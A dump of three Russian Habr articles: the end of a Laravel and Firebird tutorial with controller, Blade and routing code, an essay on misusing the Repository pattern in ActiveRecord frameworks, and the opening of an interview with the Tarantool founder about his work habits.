// запрашиваем из модели первые 20 заказчиков
// отсортированных по алфавиту
$customers = Customer::select()
->orderBy('NAME')
->take(20)
->get();
var_dump($customers);
}
}
Теперь необходимо связать методы контроллера с маршрутом. Для этого в routes.php (web.php) необходимо внести строку Route::get('/customers', 'CustomerController@showCustomers');
Здесь имя контроллера отделено от имени метода символом @.
Для быстрого построения интерфейса с сетками и диалогами редактирования будем использовать пакет « zofe/rapyd ». Мы его уже подключили ранее. Классы пакета zofe/rapyd берут на себя построение типичных запросов к моделям Eloquent ORM. Изменим контроллер заказчиков так, чтобы он выводил данные в сетку (grid), позволял производить их фильтрацию, а также добавлять, редактировать и удалять записи через диалоги редактирования. Контроллер Customer /*
* Контроллер заказчиков
*/
namespace App\Http\Controllers;
use App\Http\Controllers\Controller;
use App\Customer;
class CustomerController extends Controller {
/**
* Отображает список заказчиков
*
* @return Response
*/
public function showCustomers() {
// Подключаем виджет для поиска
$filter = \DataFilter::source(new Customer);
// Поиск будет по наименованию поставщика
$filter->add('NAME', 'Наименование', 'text');
// Задаём подпись кнопке поиска
$filter->submit('Поиск');
// Добавляем кнопку сброса фильтра и задаём её подпись
$filter->reset('Сброс');
// Создам сетку для отображения отфильтрованных данных
$grid = \DataGrid::source($filter);
// выводимые столбцы
// Поле, подпись, сортируемый
$grid->add('NAME', 'Наименование', true);
$grid->add('ADDRESS', 'Адрес');
$grid->add('ZIPCODE', 'Индекс');
$grid->add('PHONE', 'Телефон');
// Добавляем кнопки для просмотра, редактирования и удаления записи
$grid->edit('/customer/edit', 'Редактирование', 'show|modify|delete');
// Добавляем кнопку добавления заказчика
$grid->link('/customer/edit', "Добавление заказчика", "TR");
// задаём сортировку
$grid->orderBy('NAME', 'asc');
// задаём количество записей на страницу
$grid->paginate(10);
// отображаем шаблон customer и передаём в него фильтр и грид
return view('customer', compact('filter', 'grid'));
}
/**
* Добавление, редактирование и удаление заказчика
*
* @return Response
*/
public function editCustomer() {
if (\Input::get('do_delete') == 1)
return "not the first";
// создаём редактор
$edit = \DataEdit::source(new Customer());
// задаём подпись диалога в зависимости от типа операции
switch ($edit->status) {
case 'create':
$edit->label('Добавление заказчика');
break;
case 'modify':
$edit->label('Редактирование заказчика');
break;
case 'do_delete':
$edit->label('Удаление заказчика');
break;
case 'show':
$edit->label('Карточка заказчика');
// добавляем ссылку для возврата назад на список заказчиков
$edit->link('customers', 'Назад', 'TR');
break;
}
// задаём что после операций добавления, редактирования и удаления
// возвращаемся к списку заказчиков
$edit->back('insert|update|do_delete', 'customers');
// Добавляем редакторы определённого типа, задаём им подпись
// и связываем их с атрибутами модели
$edit->add('NAME', 'Наименование', 'text')->rule('required|max:60');
$edit->add('ADDRESS', 'Адрес', 'textarea')
->attributes(['rows' => 3])
->rule('max:250');
$edit->add('ZIPCODE', 'Индекс', 'text')->rule('max:10');
$edit->add('PHONE', 'Телефон', 'text')->rule('max:14');
// отображаем шаблон customer_edit и передаём в него редактор
return $edit->view('customer_edit', compact('edit'));
}
}
Laravel по умолчанию использует шаблонизатор blade. Функция view находит необходимый шаблон в директории resources/views, делает необходимые замены в нём и возвращает текст HTML страницы. Кроме того, она передаёт в него переменные, которые становятся доступными в шаблоне. Описание синтаксиса шаблонов blade вы можете найти в документации в разделе Шаблонизатор Blade .
Шаблон для отображения заказчиков выглядит следующим образом: @extends('example')
@section('title','Заказчики')
@section('body')
<h1>Заказчики</h1>
<p>
{!! $filter !!}
{!! $grid !!}
</p>
@stop
Данный шаблон унаследован от шаблона example и переопределяет его секцию body. Переменные $filter и $grid содержат HTML код для осуществления фильтрации и отображения данных в сетке. Шаблон example является общим для всех страниц. Шаблон example.blade @extends('master')
@section('title', 'Пример работы с Firebird')
@section('body')
<h1>Пример</h1>
@if(Session::has('message'))
<div class="alert alert-success">
{!! Session::get('message') !!}
</div>
@endif
<p>Пример работы с Firebird.<br/>
</p>
@stop
@section('content')
@include('menu')
@yield('body')
@stop
Этот шаблон сам унаследован от шаблона master, кроме того он подключает шаблон menu. Меню довольно простое, состоит из трёх пунктов Заказчики, Продукты и Счёт фактуры. <nav class="navbar main">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".main-collapse">
<span class="sr-only"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
</div>
<div class="collapse navbar-collapse main-collapse">
<ul class="nav nav-tabs">
<li @if (Request::is('customer*')) class="active"@endif>{!! link_to("customers", "Заказчики") !!}</li>
<li @if (Request::is('product*')) class="active"@endif>{!! link_to("products", "Товары") !!}</li>
<li @if (Request::is('invoice*')) class="active"@endif>{!! link_to("invoices", "Счёт фактуры") !!}</li>
</ul>
</div>
</nav>
В шаблоне master подключаются css стили и JavaScript файлы с библиотеками. Шаблон master.blade <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>@yield('title', 'Пример Web приложения на Firebird')</title>
<meta name="description" content="@yield('description', 'Пример Web приложения на Firebird')" />
@section('meta', '')
<link href="http://fonts.googleapis.com/css?family=Bitter" rel="stylesheet" type="text/css" />
<link href="//netdna.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet">
{!! Rapyd::styles(true) !!}
</head>
<body>
<div id="wrap">
<div class="container">
<br />
<div class="row">
<div class="col-sm-12">
@yield('content')
</div>
</div>
</div>
</div>
<div id="footer">
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script src="//netdna.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.pjax/1.9.6/jquery.pjax.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/riot/2.2.4/riot+compiler.min.js"></script>
{!! Rapyd::scripts() !!}
</body>
</html>
Шаблон редактора заказчика customer_edit выглядит следующим образом @extends('example')
@section('title', 'Редактирование заказчика')
@section('body')
<p>
{!! $edit !!}
</p>
@stop
Контроллер товаров сделан аналогично контроллеру поставщиков. Контроллер Product /*
* Контроллер товаров
*/
namespace App\Http\Controllers;
use App\Http\Controllers\Controller;
use App\Product;
class ProductController extends Controller {
/**
* Отображает список продуктов
*
* @return Response
*/
public function showProducts() {
// Подключаем виджет для поиска
$filter = \DataFilter::source(new Product);
// Поиск будет по наименованию продукта
$filter->add('NAME', 'Наименование', 'text');
$filter->submit('Поиск');
$filter->reset('Сброс');
// Создам сетку для отображения отфильтрованных данных
$grid = \DataGrid::source($filter);
// выводимые столбцы сетки
// Поле, подпись, сортируемый
$grid->add('NAME', 'Наименование', true);
// задаём формат с 2 знаками после запятой
$grid->add('PRICE|number_format[2,., ]', 'Стоимость');
$grid->row(function($row) {
// Денежные величины прижимаем вправо
$row->cell('PRICE')->style("text-align: right");
});
// Добавляем кнопки для просмотра, редактирования и удаления записи
$grid->edit('/product/edit', 'Редактирование', 'show|modify|delete');
// Добавляем кнопку добавления заказчика
$grid->link('/product/edit', "Добавление товара", "TR");
// задаём сортировку
$grid->orderBy('NAME', 'asc');
// задаём количество записей на страницу
$grid->paginate(10);
// отображаем шаблон customer и передаём в него фильтр и грид
return view('product', compact('filter', 'grid'));
}
/**
* Добавление, редактирование и удаление заказчика
*
* @return Response
*/
public function editProduct() {
if (\Input::get('do_delete') == 1)
return "not the first";
// создаём редактор
$edit = \DataEdit::source(new Product());
// задаём подпись диалога в зависимости от типа операции
switch ($edit->status) {
case 'create':
$edit->label('Добавление товара');
break;
case 'modify':
$edit->label('Редактирование товара');
break;
case 'do_delete':
$edit->label('Удаление товара');
break;
case 'show':
$edit->label('Карточка товара');
$edit->link('products', 'Назад', 'TR');
break;
}
// задаём что после операций добавления, редактирования и удаления
// возвращаемся к списку заказчиков
$edit->back('insert|update|do_delete', 'products');
// Добавляем редакторы определённого типа, задаём им подпись
// и связываем их с атрибутами модели
$edit->add('NAME', 'Наименование', 'text')->rule('required|max:100');
$edit->add('PRICE', 'Стоимость', 'text')->rule('max:19');
$edit->add('DESCRIPTION', 'Описание', 'textarea')
->attributes(['rows' => 8])
->rule('max:8192');
// отображаем шаблон product_edit и передаём в него редактор
return $edit->view('product_edit', compact('edit'));
}
}
Контроллер счёт фактур является более сложным. В него добавлена дополнительная функция оплаты счёта. Оплаченные счёт фактуры подсвечиваются другим цветом. При просмотре счёт фактуры отображаются так же её позиции. Во время редактирования счёт фактуры есть возможность редактировать и её позиции. Далее я приведу текст контроллера с подробными комментариями. Контроллер Invoice /*
* Контроллер счёт фактур
*/
namespace App\Http\Controllers;
use App\Http\Controllers\Controller;
use App\Invoice;
use App\Customer;
use App\Product;
use App\InvoiceLine;
class InvoiceController extends Controller {
/**
* Отображает список счёт-фактур
*
* @return Response
*/
public function showInvoices() {
// Модель счёт фактур будет одновременно
// выбирать связанных поставщиков
$invoices = Invoice::with('customer');
// Подключаем виджет для поиска
$filter = \DataFilter::source($invoices);
// Позволяем фильтровать по диапазону дат
$filter->add('INVOICE_DATE', 'Дата', 'daterange');
// и фильтровать по имени заказчика
$filter->add('customer.NAME', 'Заказчик', 'text');
$filter->submit('Поиск');
$filter->reset('Сброс');
// Создам сетку для отображения отфильтрованных данных
$grid = \DataGrid::source($filter);
// выводимые столбцы сетки
// Поле, подпись, сортируемый
// для даты задаём дополнительную функцию, которая преобразует дату в строку
$grid->add('INVOICE_DATE|strtotime|date[d.m.Y H:i:s]', 'Дата', true);
// для денег задам формат с двумя знаками после запятой
$grid->add('TOTAL_SALE|number_format[2,., ]', 'Сумма');
$grid->add('customer.NAME', 'Заказчик');
// Значение boolean отображаем как Да/Нет
$grid->add('PAID', 'Оплачено')
->cell(function( $value, $row) {
return $value ? 'Да' : 'Нет';
});
// задаём функцию обработки каждой строки
$grid->row(function($row) {
// Денежные величины прижимаем вправо
$row->cell('TOTAL_SALE')->style("text-align: right");
// окрашиваем оплаченные накладные в другой цвет
if ($row->cell('PAID')->value == 'Да') {
$row->style("background-color: #ddffee;");
}
});
// Добавляем кнопки для просмотра, редактирования и удаления записи
$grid->edit('/invoice/edit', 'Редактирование', 'show|modify|delete');
// Добавляем кнопку добавления счёт-фактуры
$grid->link('/invoice/edit', "Добавление счёта", "TR");
// задаём сортировку
$grid->orderBy('INVOICE_DATE', 'desc');
// задаём количество записей на страницу
$grid->paginate(10);
// отображаем шаблон customer и передаём в него фильтр и грид
return view('invoice', compact('filter', 'grid'));
}
/**
* Добавление, редактирование и удаление счет фактуры
*
* @return Response
*/
public function editInvoice() {
// Получаем текст сохранённой ошибки, если она была
$error_msg = \Request::old('error_msg');
// создаём редактор счёт фактуры
$edit = \DataEdit::source(new Invoice());
// если счёт оплачен, то генерируем ошибку при попытке его редактирования
if (($edit->model->PAID) && ($edit->status === 'modify')) {
$edit->status = 'show';
$error_msg = 'Редактирование не возможно. Счёт уже оплачен.';
}
// если счёт оплачен, то генерируем ошибку при попытке его удаления
if (($edit->model->PAID) && ($edit->status === 'delete')) {
$edit->status = 'show';
$error_msg = 'Удаление не возможно. Счёт уже оплачен.';
}
// задаём подпись диалога в зависимости от типа операции
switch ($edit->status) {
case 'create':
$edit->label('Добавление счета');
break;
case 'modify':
$edit->label('Редактирование счета');
break;
case 'do_delete':
$edit->label('Удаление счета');
break;
case 'show':
$edit->label('Счет');
$edit->link('invoices', 'Назад', 'TR');
// Если счёт фактуры не оплачена, показываем кнопку оплатить
if (!$edit->model->PAID)
$edit->link('invoice/pay/' . $edit->model->INVOICE_ID, 'Оплатить', 'BL');
break;
}
// задаём что после операций добавления, редактирования и удаления
// возвращаемся к списку счет фактур
$edit->back('insert|update|do_delete', 'invoices');
// Задаём для поля дата, что оно обязательное
// По умолчанию ставится текущая дата
$edit->add('INVOICE_DATE', 'Дата', 'datetime')
->rule('required')
->insertValue(date('Y-m-d H:i:s'));
// Добавляем поле для ввода заказчика. При наборе имени заказчика
// будет отображаться список подсказок
$edit->add('customer.NAME', 'Заказчик', 'autocomplete')
->rule('required')
->options(Customer::lists('NAME', 'CUSTOMER_ID')->all());
// добавляем поле, которое будет отображать сумму накладной, только для чтения
$edit->add('TOTAL_SALE', 'Сумма', 'text')
->mode('readonly')
->insertValue('0.00');
// Добавляем галочку Оплачено
$paidCheckbox = $edit->add('PAID', 'Оплачено', 'checkbox')
->insertValue('0')
->mode('readonly');
$paidCheckbox->checked_output = 'Да';
$paidCheckbox->unchecked_output = 'Нет';
// создаём грид для отображения строк счет фактуры
$grid = $this->getInvoiceLineGrid($edit->model, $edit->status);
// отображаем шаблон invoice_edit и передаём в него редактор и
// грид для отображения позиций
return $edit->view('invoice_edit', compact('edit', 'grid', 'error_msg'));
}
/**
* Оплата счёт фактуры
*
* @return Response
*/
public function payInvoice($id) {
try {
// находим счёт фактуру по идентификатору
$invoice = Invoice::findOrFail($id);
// вызываем процедуру оплаты
$invoice->pay();
} catch (\Illuminate\Database\QueryException $e) {
// если произошла ошибка, то
// выделяем текст исключения
$pos = strpos($e->getMessage(), 'E_INVOICE_ALREADY_PAYED');
if ($pos !== false) {
// перенаправляем на страницу редактора и отображаем там ошибку
return redirect('invoice/edit?show=' . $id)
->withInput(['error_msg' => 'Счёт уже оплачен']);
} else
throw $e;
}
// перенаправляем на страницу редактора
return redirect('invoice/edit?show=' . $id);
}
/**
* Получение сетки для строк счета фактуры
* @param \App\Invoice $invoice
* @param string $mode
* @return \DataGrid
*/
private function getInvoiceLineGrid(Invoice $invoice, $mode) {
// Получаем строки счёт фактуры
// Для каждой позиции счёта будет инициализироваться связанный с ним продукт
$lines = InvoiceLine::with('product')->where('INVOICE_ID', $invoice->INVOICE_ID);
// Создам сетку для отображения позиций накладной
$grid = \DataGrid::source($lines);
// выводимые столбцы сетки
// Поле, подпись, сортируемый
$grid->add('product.NAME', 'Наименование');
$grid->add('QUANTITY', 'Количество');
$grid->add('SALE_PRICE|number_format[2,., ]', 'Стоимость')->style('min-width: 8em;');
$grid->add('SUM_PRICE|number_format[2,., ]', 'Сумма')->style('min-width: 8em;');
// задаём функцию обработки каждой строки
$grid->row(function($row) {
$row->cell('QUANTITY')->style("text-align: right");
// Денежные величины приживаем вправо
$row->cell('SALE_PRICE')->style("text-align: right");
$row->cell('SUM_PRICE')->style("text-align: right");
});
if ($mode == 'modify') {
// Добавляем кнопки для просмотра, редактирования и удаления записи
$grid->edit('/invoice/editline', 'Редактирование', 'modify|delete');
// Добавляем кнопку добавления заказчика
$grid->link('/invoice/editline?invoice_id=' . $invoice->INVOICE_ID, "Добавление позиции", "TR");
}
return $grid;
}
/**
* Добавление, редактирование и удаление позиций счет фактуры
*
* @return Response
*/
public function editInvoiceLine() {
if (\Input::get('do_delete') == 1)
return "not the first";
$invoice_id = null;
// создаём редактор позиции счёт фактуры
$edit = \DataEdit::source(new InvoiceLine());
// задаём подпись диалога в зависимости от типа операции
switch ($edit->status) {
case 'create':
$edit->label('Добавление позиции');
$invoice_id = \Input::get('invoice_id');
break;
case 'modify':
$edit->label('Редактирование позиции');
$invoice_id = $edit->model->INVOICE_ID;
break;
case 'delete':
$invoice_id = $edit->model->INVOICE_ID;
break;
case 'do_delete':
$edit->label('Удаление позиции');
$invoice_id = $edit->model->INVOICE_ID;
break;
}
// формируем url для возврата
$base = str_replace(\Request::path(), '', strtok(\Request::fullUrl(), '?'));
$back_url = $base . 'invoice/edit?modify=' . $invoice_id;
// устанавливаем страницу для возврата
$edit->back('insert|update|do_delete', $back_url);
$edit->back_url = $back_url;
// добавляем скрытое поле с кодом счёт фактуры
$edit->add('INVOICE_ID', '', 'hidden')
->rule('required')
->insertValue($invoice_id)
->updateValue($invoice_id);
// Добавляем поле для ввода товара. При наборе имени товара
// будет отображаться список подсказок
$edit->add('product.NAME', 'Наименование', 'autocomplete')
->rule('required')
->options(Product::lists('NAME', 'PRODUCT_ID')->all());
// поле для ввода количества
$edit->add('QUANTITY', 'Количество', 'text')
->rule('required');
// отображаем шаблон invoice_line_edit и передаём в него редактор
return $edit->view('invoice_line_edit', compact('edit'));
}
}
Редактор счёт фактур имеет не стандартный для zofe/rapyd вид, поскольку нам необходимо выводить сетку с позициями счёт фактур. Для этого мы изменили шаблон invoice_edit следующим образом. Шаблон invoice_edit.blade @extends('example')
@section('title','Редактирование счета')
@section('body')
<div class="container">
{!! $edit->header !!}
@if($error_msg)
<div class="alert alert-danger">
<strong>Ошибка!</strong> {{ $error_msg }}
</div>
@endif
{!! $edit->message !!}
@if(!$edit->message)
<div class="row">
<div class="col-sm-4">
{!! $edit->render('INVOICE_DATE') !!}
{!! $edit->render('customer.NAME') !!}
{!! $edit->render('TOTAL_SALE') !!}
{!! $edit->render('PAID') !!}
</div>
</div>
{!! $grid !!}
@endif
{!! $edit->footer !!}
</div>
@stop
Теперь, когда все контроллеры написаны, изменим маршруты так, чтобы наш сайт на стартовой странице открывал список счёт фактур. Напоминаю, что маршруты настраиваются в файле app/Http/routes.php в Laravel 5.2 и routes/wep.php в Laravel 5.3. // Корневой маршрут
Route::get('/', 'InvoiceController@showInvoices');
Route::get('/customers', 'CustomerController@showCustomers');
Route::any('/customer/edit', 'CustomerController@editCustomer');
Route::get('/products', 'ProductController@showProducts');
Route::any('/product/edit', 'ProductController@editProduct');
Route::get('/invoices', 'InvoiceController@showInvoices');
Route::any('/invoice/edit', 'InvoiceController@editInvoice');
Route::any('/invoice/pay/{id}', 'InvoiceController@payInvoice');
Route::any('/invoice/editline', 'InvoiceController@editInvoiceLine');
Здесь маршрут /invoice/pay/{id} выделяет идентификатор счёт фактуры из адреса и передаёт его в метод payInvoice. Остальные маршруты не требуют отдельного пояснения.
Напоследок приведу несколько скриншотов получившегося веб приложения.
На этом мой пример закончен. Исходные коды вы можете скачать по ссылке https://github.com/sim1984/phpfbexample | https://habrahabr.ru/post/317458/ |
habrahabr | Как не нужно использовать паттерн Repository | ['php', 'yii', 'laravel', 'oop patterns', 'repository pattern'] |
Данная статья является неким опытом, который был приобретен в результате весьма неприятной архитектурной ошибки, допущенной мной при длительной разработке проекта на Laravel5.
Я постараюсь... |
Данная статья является неким опытом, который был приобретен в результате весьма неприятной архитектурной ошибки, допущенной мной при длительной разработке проекта на Laravel5 .
Я постараюсь рассказать, как использовал паттерн Repository в проекте, какие достоинства и недостатки были выявлены, как это повлияло на разработку в целом и какой профит был получен. Введение Сразу хочу предупредить, что статья скорее ориентирована на разработчиков, которые только знакомятся с паттернами проектирования, читают умные книжки, а потом пытаются все это дело применить, так сказать, в «продакшине». Весьма в тему будет упомянуть разработку с помощью frameworks, которые используют ActiveRecord (Например Yii, Laravel и др.), ведь именно благодаря ActiveRecord я продолжаю наступать на грабли и учиться решать различные проблемы. Паттерн Repository
Буквально в нескольких словах предлагаю рассмотреть, что-же такое Repository . Репозиторий представляет собой концепцию хранения коллекции для сущностей определенного типа.
Подробнее об этом паттерне можно прочитать: Паттерн «Репозиторий». Основы и разъяснения
Хранилище (Repository)
А так-же во многих книгах о программировании (Мартин Фаулер и др.)
В общем, информации достаточно много и понять, что такое Repository, достаточно «легко». Старт с Repository
Если Вы разрабатывали средние и/или большие (не в плане нагрузки, а скорее с большой кодовой базой и длительной поддержкой) проекты, то скорее всего сталкивались с недостатками и проблемами, которые возникают при использовании ActiveRecord. Основные можно выделить в небольшой список: Нарушение единой ответственности .
Из первого пункта следует, что Ваши «модели» могут быть весьма «жирными».
У новичков формируется неправильное понятие MVC, где M понимают как модель и это == 1 класс, преимущественно ActiveRecord.
Весьма ресурсозатратная организация импорта/экспорта данных, если нужно по какой-то причине работать с большим кол-во записей за раз.
Неудобно, а иногда и не реально писать кастомные запросы на SQL в случае необходимости.
Плюсы у ActiveRecord естественно тоже имеются, однако не будем их упоминать, так как это за рамками нашей статьи. И при этом если в нескольких словах, то: «ActiveRecord — это быстро, просто и легко».
Так вот, за несколько лет работы с frameworks в основе которых лежит ActiveRecord, я сталкивался скорее-всего со всеми его недостатками. И как-то начитавшись умных книжек и статей, при проектировании архитектуры нового проекта, я решил внедрить паттерн Repository.
Исходя из его простой реализации и описания — все просто: берем интерфейсы, биндим их на классы, которые будут нашими репозиториями достающими данные из «хранилища». Все отлично, в любом момент можем забиндить другой Repository, подменить реализацию методов выборки, в общем все четко.
Пошел поменял статус на Systems Architect А действительно ли Ваш «репозиторий» это Repository ?
И вот произошел момент, когда мне действительно нужно было подменить реализацию. Я приехал в офис с улыбкой и с мыслями: «Как я все легко подменю, просто создам другой класс и поменяю строку при биндинге».
Однако задача стояла, подменить выборку в первом случае из файла, а в другом из стороннего API. Когда я начал копаться и разбираться во всем этом деле, я заметил, что мои «репозитории» возвращают модели. Да, все верно, мой якобы паттерн Repository возвращает все те-же модели, которые продолжают гулять по всему проекту. Да, благодаря интерфейсу я действительно смог легко подменить реализацию, однако формат возвращаемых данных изменился. Ранее это был экземляр класс с ActiveRecord, однако теперь мой репозиторий мог возвращать массив или коллекцию.
Что это значит? Это значит, что любой представитель моей команды, мог использовать индивидуальные особенности «модели». Например мутаторы или аксессоры, или написать метод в модель с логикой и вызывать его где-угодно. Поэтому подменив реализацию, я изменил формат данных и теперь не могу гарантировать, что все приложение будет работать как работало, так-как могло произойти что угодно. Начиная от обращения к безобидному методу модели в любом месте, и заканчивая вызовом save() в виде. Никто не знает, никто не помнит, особенно если проект пережил несколько разработчиков, которые ушли и на смену им пришли новые. Без паники, тесты
Потом я вспомнил, что можно запустить тесты. Я повернулся к напарнику и спросил: «ты писал тесты ?». Он в свою очередь повернулся к другому коллеге и уточнил этот-же вопрос. В общем как оказалось не очень большой % нашего приложения был покрыт тестами. Что мы имеем?
Итак, у нас вышел дополнительный слой абстракции, который требует большего порога входа и больше времени на разработку с КПД стремящимся в 0, так-как модели как гуляли по проекту, так и продолжают гулять.
Пошел поменял статус на Junior Assistant Более детально разбираемся в проблеме
Разбираясь в системе более глубоко, перерывая примеры я заметил, что очень многие разработчики делают подобные ошибки и даже хуже.
Возможно это будет не хорошо, но я хочу представить подобный пример плохой реализации паттерна Repository .
Перерывая информацию по теме, я нашел вот такое приложение на Laravel: https://github.com/Bottelet/Flarepoint-crm/
Давайте посмотрим на пример UserRepository: https://github.com/Bottelet/Flarepoint-crm/blob/develop/app/Repositories/User/UserRepository.php
Один из методов я хочу разобрать тут (на случай, если все это пропадет): ...
public function create($requestData)
{
$settings = Settings::first();
$password = bcrypt($requestData->password);
$role = $requestData->roles;
$department = $requestData->departments;
$companyname = $settings->company;
if ($requestData->hasFile('image_path')) {
if (!is_dir(public_path(). '/images/'. $companyname)) {
mkdir(public_path(). '/images/'. $companyname, 0777, true);
}
$settings = Settings::findOrFail(1);
$file = $requestData->file('image_path');
$destinationPath = public_path(). '/images/'. $companyname;
$filename = str_random(8) . '_' . $file->getClientOriginalName() ;
$file->move($destinationPath, $filename);
$input = array_replace($requestData->all(), ['image_path'=>"$filename", 'password'=>"$password"]);
} else {
$input = array_replace($requestData->all(), ['password'=>"$password"]);
}
$user = User::create($input);
$user->roles()->attach($role);
$user->department()->attach($department);
$user->save();
Session::flash('flash_message', 'User successfully added!'); //Snippet in Master.blade.php
return $user;
}
...
Ну во первых, Repository это абстрактная работа с хранилищем. Тоесть что-то взять или что-то положить. Никой логики в Repository быть не должно.
Во вторых, нельзя использовать bcrypt и подобные вещи внутри Repository, по скольку, если Вы пишите приложение сами, Вы помните об этом, если у Вас команда, то может быть ситуация, когда в Repository кто-то положит уже шифрованный пароль, ошибку будете искать долго.
Далее, Repository — это абстрактное хранилище, поэтому он не может знать про Session, так-как может потребоваться сохранить что-то с помощью консольного вызова.
Опять таки, результатом отдается модель, которая бесконтрольно «гуляет» по приложению. Никто не защищает Вас от использования всей магии ActiveRecord.
Вероятно всего, если более-детально проанализировать подобные примеры, можно найти еще много чего интересного. Это типичный пример, когда люди не сами доходят до паттернов, а начитываются умных книг и суют свои репозитории и тд... Как использовать Repository правильно? Ну во первых, Вы должны четко понимать зачем Вам нужен данный паттерн проектирования.
Во вторых, Repository предполагает наличие сущностей, которые можно гонять по приложению. Тоесть Repository должен как принимать так и возвращать единый формат, для хранения данных. Как правило это Entity — класс с геттерами и сеттерами без логики. Получается должно быть так: если мы поменяем источник данных, то у нас не должен поменяться формат возврата.
Далее, если вы используете frameworks с ActiveRecord наверное в 99% случаях Repository будут избыточны, так-как позиция самого ActiveRecord — это некая комбинация Repository/Entity/Presenter, а в случае с Yii2, так еще и фильтров и валидации. Соответственно, чтобы действительно правильно и производительно завернуть весь ActiveRecord в Repository, Вам потребуется построить внушительный слой абстракции и целую инфраструктуру.
Если все-же необходимо по какой-то причине подружить Yii, Laravel (или что-то подобное) с Repository, скорее-всего лучшим вариантом будет использовать Doctrine . Для Yii2 и Laravel5 расширения точно есть, значит кто-то все-же подобным занимается.
Реализация паттерна Repository или что-то типа того
Я нашел статью , в которой описывается реализация паттерна Repository для Laravel5 (скорее всего для Yii2 будет примерно то-же самое). Однако по моему личному мнению в ней скорее описывается структурированный подход к написанию запросов с помощью ActiveRecord. С одной стороны удобно, уменьшаются дубли кода, худеют модели и архитектура более изящна. С другой стороны Repository не совсем выполняют свою роль «абстрактного хранилища», так-как идет работа с моделями и полная привязка к ActiveRecord со всей его магией.
Опасность может быть в следующем: при смене источника данных (обратите внимание, не обязательно менять базу или framework, достаточно получить данные из друго-го ресурса, например из стороннего API или сделав сложный кастомный запрос с помощью query builder), если Вы работали с моделями, а новая реализация вернет массив или коллекцию, то скорее всего Вы не сможете гарантировать стабильную работу Вашего приложения. Так-как попросту Вы не знаете (если проект большой и пишется не только Вами), какие методы, аксессоры/мутаторы и прочие прелести моделей были использованы и где. Выводы
Получив полезный и в то-же время горький опыт при проектировании приложения, для себя я могу подчеркнуть следующие выводы, которыми хочу поделиться (возможно это будет кому-то полезно): Вы должны четко понимать зачем используете Repository, да и вообще любой паттерн проектирования. Не достаточно просто знать или понимать как его реализовать, куда важнее понимать для чего Вы хотите его использовать и действительно ли это необходимо.
Не практикуйте Ваши только-что полученные знания на новом коммерческом проекте. Потренируйтесь на кошках или «домашнем» проекте.
Не пытайтесь играть с Repository в frameworks с ActiveRecord. Повторюсь: практически всегда это будет избыточно, за исключением тех вариантов, когда Вы действительно знаете, что делаете и отдаете себе полный отчет о последствиях.
Расширяйте свой кругозор просматривая другие инструменты. Не будьте one-framework-developer
Тесты, было бы неплохо.
| https://habrahabr.ru/post/316836/ |
habrahabr | Как работают ИТ-специалисты. Константин Осипов, разработчик и основатель проекта Tarantool | ['интервью с разработчиками', 'советы начинающим', 'лайфхак', 'привычки', 'организация работы', 'базы данных', 'tarantool'] |
Мы продолжаем расспрашивать специалистов о режиме труда и отдыха, профессиональных привычках, об инструментарии, который они используют, и многом другом.
Будет интересно выяснить, что их... |
Мы продолжаем расспрашивать специалистов о режиме труда и отдыха, профессиональных привычках, об инструментарии, который они используют, и многом другом.
Будет интересно выяснить, что их объединяет, в чем они противоречат другу другу. Возможно, их ответы помогут выявить какие-то общие закономерности, полезные советы, которые помогут многим из нас.
Сегодня наш гость — Константин Осипов, разработчик, основатель и руководитель проекта Tarantool. Константин рассказал, как ему удается совмещать пост разработчика ПО с должностью менеджера. Он также поделился своим списком литературы. Чем занимаетесь в компании?
Я пишу код, делаю ревью, обсуждаю с ребятами задачи. То есть, с одной стороны, я выполняю функции разработчика.
С другой стороны, я делаю доклады, даю интервью. Сегодня у меня многое не получалось рассказать, я запинался. Поэтому после доклада я был очень злой на себя.
С третьей стороны, я все-таки менеджер. Мне нужно помогать развиваться и расти многим людям, которые связали себя с проектом, ведь для них это все-таки карьера. А для этого нужно, чтобы развивался сам проект. Как вы работаете? Какой вы на работе?
Я очень увлекающийся человек, но у меня есть здоровая доля лени. Задачи, которые я решаю как менеджер, требуют мультитаскинга. А разработка наоборот требует погружения. Какое-то время мне было тяжело это совмещать. Я работаю из дома два дня в неделю. В офис я приезжаю в основном для обсуждений, совещаний и прочей работы с людьми. А дома я могу как раз заняться разработкой. Если у меня не получается участвовать в разработке, писать код, то я начинаю выпадать из процесса. А участие мне необходимо для того, чтобы развивать проект. Поэтому приходится переключаться.
Это интересная история, потому что многие знакомые менеджеры смотрят на это скептически. Они говорят: «Пока ты будешь кодить, ты не добьешься хорошего развития проекта. Нужно посвящать менеджерским задачам все свое время».
Но я знаю, что многие основатели проектов в сфере разработки баз данных продолжают писать код. Или, если вспомнить, например, Линуса… он же кодит. И никто не говорит, что Linux из-за этого плохо развивается. Сколько часов в сутки вы уделяете работе?
К сожалению, в среднем часов 10. Мне неприятно это говорить. Я не уверен, что необходимо столько времени уделять этому. Сколько часов вы спите?
7,5-8 часов. Вы завтракаете?
Утром ем овсянку. Мы готовим завтрак на всю семью. У нас двое детей. Один ребенок первое время отказывался от овсянки. Но потом привык (улыбается). Много времени уходит на дорогу?
Это большая проблема для меня. Я всегда был фанатом эффективности. Работа из дома – часть этого. Я пытаюсь сократить всю ненужную деятельность в своей жизни. Все должно быть максимально эффективно.
Мы сейчас живем на Юго-западной, а работа на Аэропорту — это где-то час на метро. На машине еще хуже. Первое время я очень злился, что теряю этот час. Но теперь стал смотреть лекции в метро, когда еду. А иногда я еду на велосипеде. За 6 лет работы я нашел маршрут, который идет сначала по велосипедной дорожке (на Вернадского), потом по общей дороге, а потом опять по велосипедной. Удивительно, но на велосипеде получается не дольше, чем на машине в пробке – 1,5 часа. Чем занимаетесь по пути на /с работы?
Чаще всего слушаю аудиокниги. У меня есть подписка на Audible. Каким todo-менеджером пользуетесь лично вы?
vi. Я пробовал Evernote, сейчас пробую Google Voice: говоришь OK, Google. Make a note. И он делает заметку.
